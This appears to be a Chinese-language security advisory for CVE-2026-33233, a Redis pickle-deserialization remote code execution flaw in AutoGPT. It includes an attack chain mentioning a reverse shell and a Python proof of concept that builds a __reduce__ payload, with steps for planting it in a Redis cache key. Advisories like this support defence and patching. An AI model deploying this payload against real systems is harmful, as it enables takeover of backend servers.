CVE-2026-33233 CVSS 7.6 高危

CVE-2026-33233 AutoGPT Redis反序列化导致远程代码执行漏洞

披露日期: 2026-05-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33233

漏洞类型

反序列化漏洞

CVSS评分

7.6 高危

攻击向量

邻接 (AV:A)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

AutoGPT

漏洞概述

AutoGPT是一款人工智能代理工作流自动化平台。在其0.6.34至0.6.51版本中，后端组件在处理Redis缓存数据时存在严重缺陷。系统在读取路径中盲目调用pickle.loads反序列化缓存字节，且未实施HMAC签名或严格模式验证。这使得攻击者能够通过污染共享缓存键，在后端容器上下文中执行任意代码，从而完全威胁系统的机密性、完整性和可用性。

技术细节

该漏洞属于典型的不安全反序列化漏洞，核心在于Python pickle库的不当使用。AutoGPT后端使用pickle.dumps将数据存入Redis，并在读取时无校验地调用pickle.loads。由于Pickle机制在反序列化时会自动执行字节码中定义的操作，攻击者可利用__reduce__方法构造包含系统命令的恶意对象。尽管CVSS向量显示攻击需要高权限（PR:H），但在具备相应权限或通过其他方式污染共享缓存键的情况下，攻击者将恶意Payload注入Redis。当后端进程加载被污染的缓存时，恶意代码将在后端容器上下文中被解析并执行，导致服务器被完全控制。

攻击链分析

STEP 1

1. Reconnaissance & Access

Attacker gains high privileges (PR:H) allowing them to interact with or poison the shared Redis cache instance.

STEP 2

2. Weaponization

Attacker creates a malicious Python pickle object designed to execute arbitrary commands upon deserialization using the __reduce__ method.

STEP 3

3. Delivery

Attacker writes the serialized malicious payload to a specific cache key in Redis that is known to be read by the AutoGPT backend.

STEP 4

4. Exploitation

The AutoGPT backend service reads the poisoned cache key and invokes pickle.loads() on the malicious bytes.

STEP 5

5. Execution

The pickle library executes the embedded command (e.g., reverse shell) within the context of the backend container, resulting in RCE.

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import pickle
import os
import base64

# Generate a malicious pickle payload to execute a command
# Command to execute on the target server
COMMAND = "whoami"

class Exploit(object):
    def __reduce__(self):
        # This tells pickle to execute os.system(COMMAND) when deserializing
        return (os.system, (COMMAND,))

# Serialize the exploit object
malicious_payload = pickle.dumps(Exploit())

# Convert to base64 to facilitate transport or display
encoded_payload = base64.b64encode(malicious_payload).decode('utf-8')

print(f"Generated Malicious Payload (Base64): {encoded_payload}")
print("\nUsage:")
print("1. Decode the Base64 string to bytes.")
print("2. Write the bytes to the target Redis cache key used by AutoGPT.")
print("3. Wait for AutoGPT to deserialize the key.")

影响范围

AutoGPT 0.6.34

AutoGPT 0.6.51

防御指南

临时缓解措施

建议立即升级至修复版本。若无法立即升级，应严格限制对Redis实例的访问权限，确保只有可信的后端服务能写入缓存，并监控异常的缓存键值变化。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表